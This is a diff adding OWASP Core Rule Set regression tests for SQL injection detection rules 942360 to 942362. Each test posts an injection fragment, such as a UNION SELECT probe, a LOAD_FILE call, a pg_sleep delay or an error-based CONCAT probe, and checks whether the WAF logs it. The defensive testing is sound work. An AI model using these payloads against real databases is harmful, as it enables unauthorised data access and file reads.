@@ -0,0 +1,670 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - 
test_title: 942360-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: 
HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-15 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-16 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-18 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "5desc" + version: HTTP/1.0 
+ output: + no_log_contains: id "942360" + - test_title: 942360-19 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-20 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-21 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "/select-quote" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-22 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Update: After..." 
+ version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-23 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-24 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-25 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-26 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-27 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: 
".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-28 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-29 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1816 + stages: + 
- stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-33 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-34 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-35 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-36 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: 
") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-37 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-38 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-39 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml new file mode 100644 index 00000000..fdb36966 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml 
@@ -0,0 +1,126 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942361.yaml +tests: + - test_title: 942361-1 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-2 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-3 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-4 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-5 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-6 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-7 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml new file mode 100644 index 00000000..e990aff5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
@@ -0,0 +1,551 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942362.yaml +tests: + - test_title: 942362-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - 
test_title: 942362-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + 
output: + log_contains: id "942362" + - test_title: 942362-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-18 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-20 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-21 + 